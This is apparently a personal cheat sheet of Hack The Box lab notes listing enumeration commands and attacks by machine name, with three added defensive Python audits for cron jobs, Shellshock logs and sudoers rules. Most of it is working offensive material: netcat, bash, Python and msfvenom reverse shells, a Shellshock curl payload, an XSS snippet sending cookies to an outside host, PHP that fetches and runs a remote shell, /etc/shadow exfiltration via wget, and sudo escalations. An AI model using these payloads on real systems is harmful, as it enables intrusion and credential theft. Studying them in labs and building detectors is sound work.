13. Misconfigured AD domain object permissions can be found using BloodHound.
14. The Impacket script GetNPUsers.py is used to collect the non-preauth AS-REP responses from the KDC.
15. On servers always check for SMB null session authentication and for the Kerberos pre-authentication disabled setting. These are initial entry points.
16. Port 5985 is used by the WinRM service.
17. Enumerating SMB on port 445 will give us the shares associated with that machine:
# smbmap -H 10.10.10.161 -u 0xdf -p 0xdf
or
# smbclient -N -L //10.10.10.161
18. Enumerating RPC over port 445:
# rpcclient -U "" -N 10.10.10.161

Password Spraying & Other Fun with RPCCLIENT (Black Hills article)

19. I can get a list of users with enumdomusers:
# rpcclient $> enumdomusers
20. I can list the groups as well:
# rpcclient $> enumdomgroups
21. Looking at a group for members. Read the Black Hills document above for more info:
# querygroup 0x200
22. Copy files from Windows to Kali using smbserver.py:
- On the Kali side:
# smbserver.py share . -smb2support -username df -password df
- On the Windows side:
# net use \\10.10.14.6\share /u:df df
# copy 20191018035324_BloodHound.zip \\10.10.14.6\share\
- Deleting the share:
# net use /d \\10.10.14.6\share
23. The BloodHound attack can be automated with a tool called aclpwn.
aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL-based privilege escalation paths.
24. To start aclpwn you have to first start the neo4j console; then you can use it. I usually have to specify the db credentials:
# aclpwn -du neo4j -dp neo4j1 -f svc-alfresco -ft user -d htb.local -s 10.10.10.12
Then run the aclpwn tool:
# aclpwn -f svc-alfresco -t htb.local --domain htb.local --server 10.10.10.161

secnotes———————————–
1. Connecting to SMB shares on Windows from Kali:
# smbmap -H 10.10.10.97 -u tyler -p '92g!mA8BGjOirkL%OG*&'
2. Putting a shell on the machine using SMB:
# smbclient -U 'username%password' //10.10.10.97/new-site -c 'put /opt/shells/php/cmd.php 0xdf.php'
3. Invoking a shell using netcat (nc):
# curl "http://10.10.10.97:8808/0xdf.php?cmd=nc.exe+-e+cmd.exe+10.10.14.15+443"
4. If the directory is getting cleared or cleaned, you can use the script by 0xdf to get the shell back.
5. Looking for a particular file using a Windows command shell:
# where /R c:\ bash.exe
6. On Linux always look for '.bash_history'. This can sometimes reveal critical information.
7. Connecting to a share on the local host from the command line:
# net use \\127.0.0.1\c$ /user:administrator "u6!4ZwgwOM#^OBf#Nwnh"
8. If you have a user's credentials, then you can connect to the system using winexe (or psexec.py):
# winexe -U '.\administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe
9. Logging into a share using smbclient:
# smbclient //10.10.10.19/new-site -U "tyler"
10. PHP reverse shell for Windows:
<?php
system('nc.exe -e cmd.exe 10.10.xx.xx 1337');
?>
11. Looking for a specific file using the command line:
# dir *.exe /b/s | findstr bash
12. JavaScript payload to collect another user's cookie:
<script>document.write('<img src="http://10.10.14.23:80/collect.gif?cookie=' + document.cookie + '" />')</script>

—————————-self practice————————-
Bastion
1. This machine has a backup disk image file. We need to mount this backup image and then get the username and password.
# https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25
2. Mounting a remote share from Kali:
# mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
# mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC/ -o user=anonymous
3. In Linux always mount a remote share to the local machine's '/mnt' directory.
4. I'll list all the files in the share:
# find /mnt/ -type f
5. Mounting a '.vhd' file.
- Mounting with guestmount:
# guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2/
- Mounting with qemu:
# qemu-nbd -r -c /dev/nbd0 "/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"
# mount -r /dev/nbd0p1 /mnt/vhd

Buff———————————————
1. Listing a directory in Windows. Here we use the 'dir' command with a path instead of 'cd', so we see the directory contents directly.
# dir C:\users\kamal\desktop
2. To get a better shell on Windows, always use netcat to get a reverse shell; it gives a more usable shell.
3. Building the chisel executable.
#git clone https://github.com/jpillora/chisel.git
#cd chisel
-sync go vendor modules, seems to be needed to build for Windows
#go mod vendor
-build Windows binary
#env GOOS=windows GOARCH=amd64 go build -o chisel-x64.exe -ldflags "-s -w"
-build Linux binary:
#go build -ldflags "-s -w"
https://medium.com/@vegardw/reverse-socks-proxy-using-chisel-the-easy-way-48a78df92f29
4. chisel configuration
Chisel Server
#./chisel server -p 2222 --reverse
Chisel Client
#chisel64.exe client 10.10.14.8:2222 R:8888:localhost:8888
5. Finding listening services
#netstat -ano | findstr -i listen
#netstat -ano | findstr TCP | findstr ":0"
6. Running smbserver with a username and password, with SMB 2.0 support
#smbserver.py share . -smb2support -username df -password df
Mapping the share in Windows
#net use \\10.10.14.20\s /u:df df

servmon———————————–
1. Directory traversal using the curl command
#curl http://10.129.29.110/../../../../../../../../../../../../users/Nathan/Desktop/Password.txt --path-as-is
# The '--path-as-is' option makes sure that the dotted path segments don't get normalized away by curl before the request is sent.
2. SSH port forwarding
# ssh -L 8443:127.0.0.1:8443 -N Nadine@10.129.29.110
3. Creating a malicious .bat file (its contents):
# @echo off
# c:\temp\nc.exe 10.10.10.2 1234 -e cmd.exe
4. Transferring files using scp (secure copy)
#scp nc.exe Nadine@10.10.10.184:\\Temp\\46802\\nc.exe

~~~~~~~~~~~~Linux Machines~~~~~~~~~~~~~~~~~~~~~~~~~~
BrainFuck———————————-
1. In three cases you should add domain names to the '/etc/hosts' file:
– if port 443 is open and the SSL certificate shows any domain names.
– if the nmap scan shows any domain names via DNS, they should also be added to the hosts file.
2. If the SMTP username and password are known, we can log in using telnet.
#telnet 10.10.10.17 110
3. Then use the following syntax to give the username and password.
#user kali
#pass toor
4. For retrieving emails from the command line, use the following command.
#retr 1
5. For retrieving a second mail, use the following command.
#retr 2

Shocker————————————————————–
1. If a 'cgi-bin' directory is found, check for a 'user.sh' file.
# dirb http://10.10.10.56/cgi-bin -X .sh
2. Or use gobuster to check for specific files and extensions.
# gobuster -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -t 30 -x .php,.sh,.html
3. One-liner for the Shellshock vulnerability
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://10.10.10.56/cgi-bin/user.sh
Or use the metasploit module.
4. When doing privilege escalation, use this website:
https://gtfobins.github.io/#
5. In priv-esc, if you are given root permission on any language interpreter, then we can use that language to get a shell. Here I am showing an example with perl:
#sudo perl -e 'exec "/bin/sh"'
6. Or use a perl reverse shell.

Bashed—————————————————
1.php one-liner payload with msfvenom
# msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.28 lport=4444 -f raw
#gcc test.c -o test

Nibbles————————————————————-
1. If you find a website is made with PHP, it's always better to do a directory search and look for interesting files.
2. When doing a directory search, if you are getting a '300' response code, then you have to check those pages too.
3. If you find a framework installed on a website, always check its version; in most cases you will find the exploit associated with it in exploit-db.
4. The echo command can be used to write text into an already existing file. Consider you have a script file with some default commands inside. With echo we can write our own commands into that existing script, and when it runs it executes them.
#echo "nc -lvp 5555" > monitor.sh
5. msfvenom command to get a netcat listener
#msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R
The above is the msfvenom command and below is the payload produced.
#mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0</tmp/admoszx | /bin/sh >/tmp/admoszx 2>&1; rm /tmp/admoszx

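Item 4 only works because the script that root's cron job runs could be edited by a low-privileged user; the same check applies to whatever jobs pspy turns up on a box like tartarsauce. As an added example that is not part of the original notes, this Python audit parses crontab entries (per-user or system format), resolves the script each job actually runs, and flags any that group or world can write, or that are missing from a world-writable directory. The crontab text, script names and permissions are all constructed inside a temporary directory, so it runs offline.

```python
import os
import stat
import tempfile
from typing import Dict, List, Tuple

# Interpreters that cron commands often put in front of the real script.
INTERPRETERS = {"sh", "bash", "python", "python3", "perl", "php"}


def command_target(command: str) -> str:
    """Pick the file a cron command really runs: for "bash /path/x.sh" inspect x.sh, not bash."""
    tokens = command.split()
    if not tokens:
        return ""
    if os.path.basename(tokens[0]) in INTERPRETERS and len(tokens) > 1:
        return tokens[1]
    return tokens[0]


def parse_crontab(text: str, system_format: bool) -> List[Tuple[str, str]]:
    """Return (schedule, command) pairs. System crontabs (/etc/crontab, /etc/cron.d)
    carry a user column after the schedule; per-user crontabs do not."""
    user_cols = 1 if system_format else 0
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # blank, comment, or VAR=value assignment
        if line.startswith("@"):          # @reboot, @daily, ...
            fields = line.split(None, 1 + user_cols)
            if len(fields) < 2 + user_cols:
                continue
            entries.append((fields[0], fields[-1]))
        else:
            n = 5 + user_cols
            fields = line.split(None, n)
            if len(fields) <= n:
                continue
            entries.append((" ".join(fields[:5]), fields[n]))
    return entries


def writable_by_others(path: str) -> bool:
    """True if group/world can write the file, or if it does not exist but sits in a
    world-writable directory (anyone could create it before the job fires)."""
    try:
        return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    except FileNotFoundError:
        parent = os.path.dirname(path) or "."
        try:
            return bool(os.stat(parent).st_mode & stat.S_IWOTH)
        except FileNotFoundError:
            return False


def audit_crontab(text: str, system_format: bool = False) -> List[Dict[str, str]]:
    """Report jobs whose script an unprivileged user could edit."""
    findings = []
    for sched, command in parse_crontab(text, system_format):
        target = command_target(command)
        if target.startswith("/") and writable_by_others(target):
            findings.append({"schedule": sched, "command": command, "target": target})
    return findings


def demo_audit() -> List[Dict[str, str]]:
    """Constructed demonstration: two scripts in a temp dir, one of them world-writable."""
    workdir = tempfile.mkdtemp(prefix="cron-audit-")
    weak = os.path.join(workdir, "monitor.sh")
    safe = os.path.join(workdir, "backup.sh")
    for path in (weak, safe):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\necho ok\n")
    os.chmod(weak, 0o777)                 # anyone can append to what root will run
    os.chmod(safe, 0o755)
    crontab_text = (
        "SHELL=/bin/bash\n"
        "# constructed /etc/crontab-style sample\n"
        f"*/1 * * * * root {weak}\n"
        f"0 3 * * * root /bin/bash {safe}\n"
        "@reboot root /usr/bin/true\n"
    )
    return audit_crontab(crontab_text, system_format=True)


if __name__ == "__main__":
    for f in demo_audit():
        print(f"{f['schedule']}  {f['command']}  ->  {f['target']} is writable by others")
```

Feed `audit_crontab` the contents of /etc/crontab and the files under /etc/cron.d with `system_format=True`, and the output of `crontab -l` for each user with the default; anything it reports is a script whose owner and the job's user disagree about who may change it.
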
Beep————————————————————-
1. Whenever you find a machine with port 80 open, always dir-search it with dirb and any other tools.
2. Metasploit module to check for priv-escalation:
Run the Local Exploit Suggester for privilege escalation suggestions.
#use post/multi/recon/local_exploit_suggester
3. searchsploit modules are located under "/usr/share/exploitdb/exploit"
4. If you have gibberish data in a web page, using "view-source" will reveal the code in a clean format.
5. A list of SSH users can be retrieved from the "/etc/passwd" file after removing the 'nologin' entries.
6. curl one-liner for code execution if you have found a ".cgi" file. It's like combining curl and the .cgi for code execution.
#curl -k -H "user-agent: () { :; }; bash -i >& /dev/tcp/10.10.14.3/8081 0>&1" https://10.10.10.7:10000/session_login.cgi
7. Privilege escalation using nmap
#sudo nmap --interactive
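The Shocker one-liner and the curl in item 6 above both ride on the User-Agent header, and on the server side they leave a very recognisable trail. As an added example (not from the original notes), this Python detector parses combined-format web access log lines and reports requests whose User-Agent or Referer begins with the Shellshock trigger `() {`; the anchoring at the start of the header value matters, because that is the only position where a vulnerable bash treats the value as a function definition. The log lines are constructed samples.

```python
import re
from typing import Dict, List

# The Shellshock trigger: the header value must *start* with an empty function
# definition "() {" (whitespace optional) for a vulnerable bash to parse it as code.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")

# Apache/nginx "combined" log format:
# client ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def find_shellshock_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """One record per line whose Referer or User-Agent carries the Shellshock trigger."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue                      # not a combined-format line; skip it
        request = m.group("request").split(" ")
        path = request[1] if len(request) > 1 else m.group("request")
        for field in ("agent", "referer"):
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                hits.append({"client": m.group("client"), "time": m.group("time"),
                             "path": path, "status": m.group("status"),
                             "field": field, "value": value})
                break                     # one record per line is enough
    return hits


# Constructed sample log lines (not from any real server).
SAMPLE_LOG = [
    "10.10.14.3 - - [12/May/2021:10:01:02 +0000] \"GET /cgi-bin/user.sh HTTP/1.1\" 200 118 \"-\" "
    "\"() { :; }; echo; echo; /bin/bash -c 'id'\"",
    "10.10.14.3 - - [12/May/2021:10:01:05 +0000] \"GET /index.html HTTP/1.1\" 200 5120 \"-\" "
    "\"Mozilla/5.0 (X11; Linux x86_64)\"",
    "192.0.2.7 - - [12/May/2021:10:02:11 +0000] \"GET /session_login.cgi HTTP/1.1\" 500 0 "
    "\"(){ :;}; /usr/bin/id\" \"curl/7.68.0\"",
    "192.0.2.8 - - [12/May/2021:10:03:00 +0000] \"GET /cgi-bin/user.sh HTTP/1.1\" 200 118 \"-\" "
    "\"Mozilla/5.0 () { not the trigger, not at the start\"",
]

if __name__ == "__main__":
    for h in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{h['time']} {h['client']} {h['path']} via {h['field']}: {h['value']}")
```

The fourth sample line is deliberately a near miss: `() {` appears mid-string, which bash never interprets, so an unanchored pattern would raise a false alarm there. Any hit against a path under cgi-bin with a 200 status deserves a look at what the CGI script actually executed.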

Cronos————————————————–
1. If port '53' is open, the first thing to figure out is the domain names, using nslookup.
2. Another thing to check if port 53 is open is a zone transfer, using the host command.
#host -l cronos.htb 10.10.10.13
3. Zone transfer using the dig command
#dig axfr @10.10.10.13 cronos.htb
4. Command to find the number of passwords in a file using "wc".
#wc -l /usr/share/john/password.lst
5. Running SQL injection from a Burp request
# sqlmap -v 4 -r login.txt
First intercept the login request using Burp and save it in a file (login.txt). Then run sqlmap on the request.
6. Python one-liner
#python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
7. SQL injection cheat-sheet: https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
8. cronjob: https://tigr.net/3203/2014/09/13/getting-wordpress-cron-work-in-multisite-environment/

Nineveh——————————————————————
1. Hydra attack
#hydra -l 'admin' -P rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"
2. wget to download shell code
# wget YOURIP/shell.txt -O /tmp/shell.php
3. PHP code to download a shell and then execute it
# <?php system("wget YOURIP/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>
-wget – downloads the main file onto the target machine
-O /tmp/shell.php – saves the text file as a .php file inside the /tmp folder so we can execute it
-;php /tmp/shell.php – runs the php file with our malicious payload inside
4. Reading a user's mail
# cat /var/mail/amrois
5. If there is any secret folder with an image, use binwalk to extract contents from the image
# binwalk -e secret.png
#strings secret.png
strings will also extract readable contents from an image.
6. If an SSH private key is available, then we can use it to log in to the victim machine
#ssh -i sshkey.key amrois@10.10.10.43
Note: If you get an error saying the key file is unprotected, simply chmod it to 600.
7. bash reverse shell
# bash -i >& /dev/tcp/X.X.X.X/1337 0>&1

SolidState——————————————————————————
1. If port 110 is open, try connecting to it using telnet
#telnet 10.10.10.51 110
#user kamal
#pass password
2. To list the emails on the POP3 port, use the "list" command followed by "retr 1"
#LIST
#retr 1
3. If any unfamiliar service or port is open, we can use the netcat tool to connect to that port and then authenticate
# nc 192.156.23.21 4505
4. Looking for processes owned by a particular user
#ps aux | grep james
5. Making a Python file for a reverse shell
#!/usr/bin/env python
import os
import sys
os.system('/bin/nc -e /bin/bash 10.10.14.12 7777')
6. Crontab command to list the current crontab file
#crontab -l
7. Telnet to test SMTP: https://docs.microsoft.com/en-us/exchange/mail-flow/test-smtp-with-telnet?view=exchserver-2019

Node—————————————————–
1. Hashes can be looked up at https://crackstation.net
2. ".backup" files can be read with the cat command.
3. Decoding a base64-encoded file
#cat myplace.backup | base64 --decode > myplace
4. Finding the file type
#file myfile
5. Brute-forcing a password-protected zip file
#fcrackzip -D -p /usr/share/wordlists/rockyou.txt data.zip
6. Checking for processes run by a different user. This will check for processes run by tom.
#ps aux | grep tom
7. Python reverse shell
#msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport=8765 R
8. Connecting to the running MongoDB service with the mongo client and using the scheduler database to tell it what to run.
#mongo -u admin -p kam2341 scheduler
9. A symbolic link, also known as a symlink or soft link, is a special type of file that points to another file or directory.
#ln -s /root/root.txt /tmp/test
10. When you get an executable, look for the following:
-file type
#file backup
-strings in the executable
#strings backup
-the library calls made by the executable
# ltrace backup test1
Here we use the 'ltrace' command. ltrace intercepts and records the dynamic calls a process makes to shared libraries. The amount of output generated by ltrace can be overwhelming for some commands.
11. The ~ is used to specify a user's home directory, more specifically whatever is defined in the $HOME environment variable. Changing "$HOME" to some other location lets us do the privilege escalation:
#export HOME=/root/

Valentine——————————————–
1. Removing spaces from lines using the sed command
#sed 's/ //g' filename.txt > sshkey
2. When exploit code is written with Windows newline characters, use the following command to remove them
#sed -i -e "s/^M//" exploit.sh
(the ^M is typed as Ctrl-V then Ctrl-M; "s/\r//" does the same in GNU sed)
3. Decoding a base64 string
# echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d
4. If you have the passphrase and the private key, you can log in over SSH. Usually the private key will have the name of the SSH user in most cases.
# ssh -i key hype@10.10.10.79
5. Creating a reverse Python shell
#msfvenom -p cmd/unix/reverse_python lhost=10.10.14.22 lport=1234 R
6. Also look into the bash history. Sometimes history will give us a good clue on how to proceed.
7. Compiling the Dirty COW exploit
# gcc -pthread dirty.c -o dirty -lcrypt

Valentine—————————————————————————-
1. Decoding a base64 value
#cat file | base64 -d
2. Using scp (secure copy) to copy files from the victim machine
#scp charix@10.10.10.84:secret.zip /root/Desktop/
3. Checking for running services using sockstat
#sockstat -4 -l
4. Checking for open services with netstat
# netstat -an
# netstat -an -p tcp
5. Port numbers of VNC
5900+ and 5800+
6. Local SSH tunneling
# ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84
7. Opening a VNC viewer
#vncviewer -passwd secret 127.0.0.1:5901
8. Decoding a string 13 times
import base64
inp_string = "encoded string"
times = 13
for i in range(times):
    inp_string = base64.b64decode(inp_string)
out_string = inp_string.decode('UTF-8')
print(out_string)
9. Checking for processes
#ps -auwwx | grep vnc
10. Tunneling using proxychains
11. Enabling VNC for the root user.
#cat /etc/rc.conf

Sunday—————————————————-
1. "unable to negotiate" >> if this error comes up on an SSH connection, this is the probable reason:
In this case, the client and server were unable to agree on the key exchange algorithm. The server offered only a single method, diffie-hellman-group1-sha1. OpenSSH supports this method but does not enable it by default, because it is weak and within theoretical range of the so-called Logjam attack.
#ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022
Here, with the help of "-oKexAlgorithms", we specify the algorithm which the SSH server supports.
https://mycyberuniverse.com/error/no-matching-key-exchange-method-found-openssh7.html
2. "sudo -l" lists the commands the current user may run with sudo, and
"find / -perm -u=s -type f 2>/dev/null" checks for system binaries with the SUID bit set.
3. Generating an ".elf" payload
#msfvenom -p solaris/x86/shell_reverse_tcp lhost=10.10.14.6 lport=5555 -f elf > /root/Desktop/raj.elf
ELF – Executable and Linkable Format; ELF was chosen as the standard binary file format for Unix and Unix-like systems on x86 processors.
4. Opening up a PHP web server
#php -S 0.0.0.0:80
5. Using wget to transfer a specific file
#sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.6
On the other end open nc:
#nc -lvp 80
6. The finger service is installed here.
7. If there are 2-3 different SSH users, then there is a chance of different users having different privesc methods to work on.

tartarsauce———————————————————
1. netcat reverse shell
# msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R
2. Identify cron jobs with pspy. pspy is my go-to for process detection.
https://github.com/DominicBreuker/pspy
3. Running a command with the sudo permission of another user
#sudo -u kamal tar -xvf
4. Converting a shell file to a tar file
# tar -cvf a.tar a.sh
5. Using the tar command to execute a shell
#sudo -u onuma tar -xvf a.tar --to-command /bin/bash
6. Another privesc with tar, where the option "--checkpoint=x" can be used to execute a shell. This option allows a user to specify an action to run at each checkpoint.
#sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

Irked————————————————-
1. To see the code of searchsploit exploit modules
# searchsploit -x exploits/linux/remote/exploit.rb
2. Extracting hidden data from images using steganography tools
#steghide info irked.jpg
# steghide extract -sf irked.jpg
3. Command to see the working of executables: ltrace.
# ltrace ./viewuser
4. When you come across backdoor exploits, always check the exploits in exploit-db and searchsploit. Those codes will give you an idea of how the exploit works.
5. Looking for binaries for priv-esc.
#ls -lah /usr/bin/
Here when listing, you will get some binaries shown in red; those are SUID binaries.

Friendzone————————————-
1. Enumerating SMB if the SMB port is open
#smbmap -H 10.10.10.123
2. Connecting to the SMB service
# smbclient //10.10.10.123/general
3. Enumerating subdomains using the host command
#host -l friendzone.red 10.10.10.123
4. Looking for a zone transfer
#dig axfr friendzone.red @10.10.10.123
5. Putting files onto the share via the SMB service (from within smbclient)
#put shell.php
6. Editing the sudoers file and adding a user
# sudo vi /etc/sudoers
and adding a user named 'kamal':
#kamal ALL=(ALL) NOPASSWD:ALL
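The entry above grants everything without a password, and the tar, perl, nmap and wget escalations in the sections above all start from a narrower sudo rule that still hands a user a binary that can spawn a shell. As an added example that is not part of the original notes, this Python audit parses sudoers-style rules and flags ALL command sets, NOPASSWD tags and binaries known to escape to a shell; the sudoers text is a constructed sample whose entries mirror the rules seen on this page.

```python
import os
import re
from typing import Dict, List

# Binaries the privesc notes on this page abuse (tar, perl, nmap, wget, vi) plus the
# usual shells; a sudo rule handing any of these to a user is worth a review.
SHELL_ESCAPE_BINARIES = {"tar", "perl", "nmap", "wget", "vi", "vim", "python", "python3", "bash", "sh"}

# who host = (runas) [TAG:] cmd[, cmd...]   e.g.  kamal ALL=(ALL) NOPASSWD:ALL
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"\b(?:NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC)\s*:\s*")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text: str) -> List[Dict[str, str]]:
    """Return the user/group rules of a sudoers file as dicts (aliases and Defaults are skipped)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # comments and #include lines drop out
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({"who": m.group("who"), "host": m.group("host"),
                          "runas": m.group("runas") or "root",
                          "cmds": m.group("cmds").strip()})
    return rules


def audit_sudoers(text: str) -> List[Dict[str, str]]:
    """Flag rules that give a non-root principal ALL, or a binary known to spawn a shell."""
    findings = []
    for rule in parse_sudoers(text):
        if rule["who"] == "root":
            continue                                  # root is expected to have everything
        nopasswd = "NOPASSWD:" in rule["cmds"]
        for cmd in (c.strip() for c in TAG_RE.sub("", rule["cmds"]).split(",")):
            if not cmd:
                continue
            binary = os.path.basename(cmd.split()[0])
            reasons = []
            if cmd == "ALL":
                reasons.append("unrestricted command set")
            elif binary in SHELL_ESCAPE_BINARIES:
                reasons.append(f"{binary} can spawn a shell (see GTFOBins)")
            if reasons and nopasswd:
                reasons.append("no password required")
            if reasons:
                findings.append({"who": rule["who"], "runas": rule["runas"],
                                 "command": cmd, "reason": "; ".join(reasons)})
    return findings


# Constructed sudoers sample; the www-data/onuma rule is the shape that the tar
# checkpoint trick in the tartarsauce notes relies on.
SAMPLE_SUDOERS = """\
Defaults env_reset
# constructed sample, not a real system's file
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
kamal    ALL=(ALL) NOPASSWD:ALL
www-data ALL=(onuma) NOPASSWD: /bin/tar
nadine   ALL=(root) /usr/sbin/service apache2 restart, /usr/bin/nmap
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['who']} -> ({f['runas']}) {f['command']}: {f['reason']}")
```

Point it at `sudo -l` output reshaped into rule lines, or at /etc/sudoers and /etc/sudoers.d/* on a host you administer; a rule that names a specific binary is not automatically safe, which is why the binary list matters as much as the ALL check.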